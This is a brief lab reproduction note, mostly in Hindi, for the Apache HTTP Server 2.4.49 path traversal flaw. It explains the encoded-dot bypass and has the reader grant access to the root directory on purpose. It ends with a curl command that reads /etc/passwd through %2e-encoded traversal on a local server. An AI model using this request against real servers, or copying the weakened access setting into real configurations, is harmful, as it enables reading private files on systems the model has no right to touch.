
Apache HTTP Server 2.4.49 Path Traversal Vulnerability Reproduction
ap_normalize_path के कार्यान्वयन में दोष है, जिसके कारण हमलावर %2e एन्कोडिंग वाले विशेष अनुरोधों को बनाकर पहुँच नियंत्रण को बायपास कर सकते हैं और वेब सर्वर पर किसी भी फ़ाइल को पढ़ सकते हैं।<Directory /> में Require all denied को Require all granted में बदलें/vuln को /tmp/vuln_dir पर इंगित करने के लिए जोड़ें और अनुमतियाँ सेट करेंcurl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
